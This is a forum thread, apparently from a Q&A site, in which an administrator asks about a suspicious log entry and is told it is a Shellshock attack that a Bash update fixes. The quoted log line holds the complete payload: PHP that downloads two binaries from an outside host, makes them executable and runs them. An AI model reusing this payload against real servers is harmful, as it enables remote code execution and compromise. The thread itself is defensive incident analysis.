0

We discovered binaries /tmp/susu1 and /tmp/susu2 and executed by the webserver user.

In the logs we have the following entries:

[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
  echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
  ''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
  $g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
  if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
  $g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
  $h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

But we found only the error codes 301, 302, 403, 404, 500 of such requests. No 200er code which would indicate that the hack was successful.

Is this a common security problem? How can it be fixed? Or how can it be further tracked down?

Alex
  • 476
  • 13
  • 35

1 Answers1

0

This seems a shellshock attack, it was announced the first time on 24 September 2014 when the bash release the fix for this bug.

from wikipedia about shellshock

The first bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables.1[6] Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities, (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187); which Ramey addressed with a series of further patches.

You can check if your system is vulnerable as explained in How to test if my server is vulnerable to the ShellShock bug?

You have to update your system or at least your Bash version to fix the problem.

Community
  • 1
Ziomizar
  • 1